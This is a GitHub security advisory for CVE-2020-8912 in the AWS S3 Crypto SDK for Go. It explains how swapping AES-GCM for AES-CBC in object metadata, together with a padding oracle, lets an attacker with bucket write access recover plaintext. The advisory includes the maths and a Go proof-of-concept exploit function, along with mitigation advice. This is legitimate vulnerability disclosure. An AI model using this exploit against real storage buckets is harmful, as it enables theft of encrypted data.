ghsa-7f33-f4f5-xwgw
Vulnerability from github
Published
2022-02-11 23:23
Modified
2024-05-20 21:14
Severity ?
2.5 (Low) - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
Summary
In-band key negotiation issue in AWS S3 Crypto SDK for golang
Details

Summary

The golang AWS S3 Crypto SDK is impacted by an issue that can result in loss of confidentiality and message forgery. The attack requires write access to the bucket in question, and that the attacker has access to an endpoint that reveals decryption failures (without revealing the plaintext) and that when encrypting the GCM option was chosen as content cipher.

Risk/Severity

The vulnerability pose insider risks/privilege escalation risks, circumventing KMS controls for stored data.

Impact

This advisory describes the plaintext revealing vulnerabilities in the golang AWS S3 Crypto SDK, with a similar issue in the non "strict" versions of C++ and Java S3 Crypto SDKs being present as well.

V1 prior to 1.34.0 of the S3 crypto SDK does not authenticate the algorithm parameters for the data encryption key.

An attacker with write access to the bucket can use this in order to change the encryption algorithm of an object in the bucket, which can lead to problems depending on the supported algorithms. For example, a switch from AES-GCM to AES-CTR in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation.

By default, the only available algorithms in the SDK are AES-GCM and AES-CBC. Switching the algorithm from AES-GCM to AES-CBC can be used as way to reconstruct the plaintext through an oracle endpoint revealing decryption failures, by brute forcing 16 byte chunks of the plaintext. Note that the plaintext needs to have some known structure for this to work, as a uniform random 16 byte string would be the same as a 128 bit encryption key, which is considered cryptographically safe.

The attack works by taking a 16 byte AES-GCM encrypted block guessing 16 bytes of plaintext, constructing forgery that pretends to be PKCS5 padded AES-CBC, using the ciphertext and the plaintext guess and that will decrypt to a valid message if the guess was correct.

To understand this attack, we have to take a closer look at both AES-GCM and AES-CBC: AES-GCM encrypts using a variant of CTR mode, i.e. C_i = AES-Enc(CB_i) ^ M_i. AES-CBC on the other hand decrypts via M_i = AES-Dec(C_i) ^ C_{i-1}, where C_{-1} = IV. The padding oracle can tell us if, after switching to CBC mode, the plaintext recovered is padded with a valid PKCS5 padding.

Since AES-Dec(C_i ^ M_i) = CB_i, if we set IV' = CB_i ^ 0x10*[16], where 0x10*[16] is the byte 0x10 repeated 16 times, and C_0' = C_i ^ M_i' the resulting one block message (IV', C_0') will have valid PKCS5 padding if our guess M_i' for M_i was correct, since the decrypted message consists of 16 bytes of value 0x10, the PKCS5 padded empty string.

Note however, that an incorrect guess might also result in a valid padding, if the AES decryption result randomly happens to end in 0x01, 0x0202, or a longer valid padding. In order to ensure that the guess was indeed correct, a second check using IV'' = IV' ^ (0x00*[15] || 0x11) with the same ciphertext block has to be performed. This will decrypt to 15 bytes of value 0x10 and one byte of value 0x01 if our initial guess was correct, producing a valid padding. On an incorrect guess, this second ciphertext forgery will have an invalid padding with a probability of 1:2^128, as one can easily see.

This issue is fixed in V2 of the API, by using the KMS+context key wrapping scheme for new files, authenticating the algorithm. Old files encrypted with the KMS key wrapping scheme remain vulnerable until they are reencrypted with the new scheme.

Mitigation

Using the version 2 of the S3 crypto SDK will not produce vulnerable files anymore. Old files remain vulnerable to this problem if they were originally encrypted with GCM mode and use the KMS key wrapping option.

Proof of concept

A Proof of concept is available in a separate github repository.

This particular issue is described in combined_oracle_exploit.go:

golang func CombinedOracleExploit(bucket string, key string, input *OnlineAttackInput) (string, error) { data, header, err := input.S3Mock.GetObjectDirect(bucket, key) if alg := header.Get("X-Amz-Meta-X-Amz-Cek-Alg"); alg != "AES/GCM/NoPadding" { return "", fmt.Errorf("Algorithm is %q, not GCM!", alg) } gcmIv, err := base64.StdEncoding.DecodeString(header.Get("X-Amz-Meta-X-Amz-Iv")) if len(gcmIv) != 12 { return "", fmt.Errorf("GCM IV is %d bytes, not 12", len(gcmIv)) } fullIv := make([]byte, 16) confirmIv := make([]byte, 16) for i := 0; i < 12; i++ { fullIv[i] = gcmIv[i] ^ 0x10 confirmIv[i] = gcmIv[i] ^ 0x10 } // Set i to the block we want to attempt to decrypt counter := i + 2 for j := 15; j >= 12; j-- { v := byte(counter % 256) fullIv[j] = 0x10 ^ v confirmIv[j] = 0x10 ^ v counter /= 256 } confirmIv[15] ^= 0x11 fullIvEnc := base64.StdEncoding.EncodeToString(fullIv) confirmIvEnc := base64.StdEncoding.EncodeToString(confirmIv) success := false // Set plaintextGuess to the guess for the plaintext of this block newData := []byte(plaintextGuess) for j := 0; j < 16; j++ { newData[j] ^= data[16*i+j] } newHeader := header.Clone() newHeader.Set("X-Amz-Meta-X-Amz-Cek-Alg", "AES/CBC/PKCS5Padding") newHeader.Set("X-Amz-Meta-X-Amz-Iv", fullIvEnc) newHeader.Set("X-Amz-Meta-X-Amz-Unencrypted-Content-Length", "16") input.S3Mock.PutObjectDirect(bucket, key+"guess", newData, newHeader) if input.Oracle(bucket, key+"guess") { newHeader.Set("X-Amz-Meta-X-Amz-Iv", confirmIvEnc) input.S3Mock.PutObjectDirect(bucket, key+"guess", newData, newHeader) if input.Oracle(bucket, key+"guess") { return plaintextGuess, nil } } return "", fmt.Errorf("Block %d could not be decrypted", i) }

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/aws/aws-sdk-go"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.34.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-8912"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-327"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-24T18:08:44Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "### Summary\n\nThe golang AWS S3 Crypto SDK is impacted by an issue that can result in loss of confidentiality and message forgery. The attack requires write access to the bucket in question, and that the attacker has access to an endpoint that reveals decryption failures (without revealing the plaintext) and that when encrypting the GCM option was chosen as content cipher.\n\n### Risk/Severity\n\nThe vulnerability pose insider risks/privilege escalation risks, circumventing KMS controls for stored data.\n\n### Impact\n\nThis advisory describes the plaintext revealing vulnerabilities in the golang AWS S3 Crypto SDK, with a similar issue in the non \"strict\" versions of C++ and Java S3 Crypto SDKs being present as well.\n\nV1 prior to 1.34.0 of the S3 crypto SDK does not authenticate the algorithm parameters for the data encryption key.\n\nAn attacker with write access to the bucket can use this in order to change the encryption algorithm of an object in the bucket, which can lead to problems depending on the supported algorithms. For example, a switch from AES-GCM to AES-CTR in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation.\n\nBy default, the only available algorithms in the SDK are AES-GCM and AES-CBC. Switching the algorithm from AES-GCM to AES-CBC can be used as way to reconstruct the plaintext through an oracle endpoint revealing decryption failures, by brute forcing 16 byte chunks of the plaintext. Note that the plaintext needs to have some known structure for this to work, as a uniform random 16 byte string would be the same as a 128 bit encryption key, which is considered cryptographically safe.\n\nThe attack works by taking a 16 byte AES-GCM encrypted block guessing 16 bytes of plaintext, constructing forgery that pretends to be PKCS5 padded AES-CBC, using the ciphertext and the plaintext guess and that will decrypt to a valid message if the guess was correct.\n\nTo understand this attack, we have to take a closer look at both AES-GCM and AES-CBC:\nAES-GCM encrypts using a variant of CTR mode, i.e. `C_i = AES-Enc(CB_i) ^ M_i`. AES-CBC on the other hand *decrypts* via `M_i = AES-Dec(C_i) ^ C_{i-1}`, where `C_{-1} = IV`. The padding oracle can tell us if, after switching to CBC mode, the plaintext recovered is padded with a valid PKCS5 padding.\n\nSince `AES-Dec(C_i ^ M_i) = CB_i`, if we set `IV\u0027 = CB_i ^ 0x10*[16]`, where `0x10*[16]` is the byte `0x10` repeated 16 times, and `C_0\u0027 = C_i ^ M_i\u0027` the resulting one block message `(IV\u0027, C_0\u0027)` will have valid PKCS5 padding if our guess `M_i\u0027` for `M_i` was correct, since the decrypted message consists of 16 bytes of value `0x10`, the PKCS5 padded empty string.\n\nNote however, that an incorrect guess might also result in a valid padding, if the AES decryption result randomly happens to end in `0x01`, `0x0202`, or a longer valid padding. In order to ensure that the guess was indeed correct, a second check using `IV\u0027\u0027 = IV\u0027 ^ (0x00*[15] || 0x11)` with the same ciphertext block has to be performed. This will decrypt to 15 bytes of value `0x10` and one byte of value `0x01` if our initial guess was correct, producing a valid padding. On an incorrect guess, this second ciphertext forgery will have an invalid padding with a probability of 1:2^128, as one can easily see.\n\nThis issue is fixed in V2 of the API, by using the `KMS+context` key wrapping scheme for new files, authenticating the algorithm. Old files encrypted with the `KMS` key wrapping scheme remain vulnerable until they are reencrypted with the new scheme.\n\n### Mitigation\n\nUsing the version 2 of the S3 crypto SDK will not produce vulnerable files anymore. Old files remain vulnerable to this problem if they were originally encrypted with GCM mode and use the `KMS` key wrapping option.\n\n### Proof of concept\n\nA [Proof of concept](https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc) is available in a separate github repository.\n\nThis particular issue is described in [combined_oracle_exploit.go](https://github.com/sophieschmieg/exploits/blob/master/aws_s3_crypto_poc/exploit/combined_oracle_exploit.go):\n\n```golang\nfunc CombinedOracleExploit(bucket string, key string, input *OnlineAttackInput) (string, error) {\n\tdata, header, err := input.S3Mock.GetObjectDirect(bucket, key)\n\tif alg := header.Get(\"X-Amz-Meta-X-Amz-Cek-Alg\"); alg != \"AES/GCM/NoPadding\" {\n\t\treturn \"\", fmt.Errorf(\"Algorithm is %q, not GCM!\", alg)\n\t}\n\tgcmIv, err := base64.StdEncoding.DecodeString(header.Get(\"X-Amz-Meta-X-Amz-Iv\"))\n\tif len(gcmIv) != 12 {\n\t\treturn \"\", fmt.Errorf(\"GCM IV is %d bytes, not 12\", len(gcmIv))\n\t}\n\tfullIv := make([]byte, 16)\n\tconfirmIv := make([]byte, 16)\n\tfor i := 0; i \u003c 12; i++ {\n\t\tfullIv[i] = gcmIv[i] ^ 0x10\n\t\tconfirmIv[i] = gcmIv[i] ^ 0x10\n\t}\n        // Set i to the block we want to attempt to decrypt\n\tcounter := i + 2\n\tfor j := 15; j \u003e= 12; j-- {\n\t\tv := byte(counter % 256)\n\t\tfullIv[j] = 0x10 ^ v\n\t\tconfirmIv[j] = 0x10 ^ v\n\t\tcounter /= 256\n\t}\n\tconfirmIv[15] ^= 0x11\n\tfullIvEnc := base64.StdEncoding.EncodeToString(fullIv)\n\tconfirmIvEnc := base64.StdEncoding.EncodeToString(confirmIv)\n\tsuccess := false\n        // Set plaintextGuess to the guess for the plaintext of this block\n\tnewData := []byte(plaintextGuess)\n\tfor j := 0; j \u003c 16; j++ {\n\t\tnewData[j] ^= data[16*i+j]\n\t}\n\tnewHeader := header.Clone()\n\tnewHeader.Set(\"X-Amz-Meta-X-Amz-Cek-Alg\", \"AES/CBC/PKCS5Padding\")\n\tnewHeader.Set(\"X-Amz-Meta-X-Amz-Iv\", fullIvEnc)\n\tnewHeader.Set(\"X-Amz-Meta-X-Amz-Unencrypted-Content-Length\", \"16\")\n\tinput.S3Mock.PutObjectDirect(bucket, key+\"guess\", newData, newHeader)\n\tif input.Oracle(bucket, key+\"guess\") {\n\t\tnewHeader.Set(\"X-Amz-Meta-X-Amz-Iv\", confirmIvEnc)\n\t\tinput.S3Mock.PutObjectDirect(bucket, key+\"guess\", newData, newHeader)\n\t\tif input.Oracle(bucket, key+\"guess\") {\n\t\t\treturn plaintextGuess, nil\n\t\t}\n\t}\n\treturn \"\", fmt.Errorf(\"Block %d could not be decrypted\", i)\n}\n```",
  "id": "GHSA-7f33-f4f5-xwgw",
  "modified": "2024-05-20T21:14:49Z",
  "published": "2022-02-11T23:23:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aws/aws-sdk-go/pull/3403"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4"
    },
    {
      "type": "WEB",
      "url": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/aws/aws-sdk-go"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2022-0646"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "In-band key negotiation issue in AWS S3 Crypto SDK for golang"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.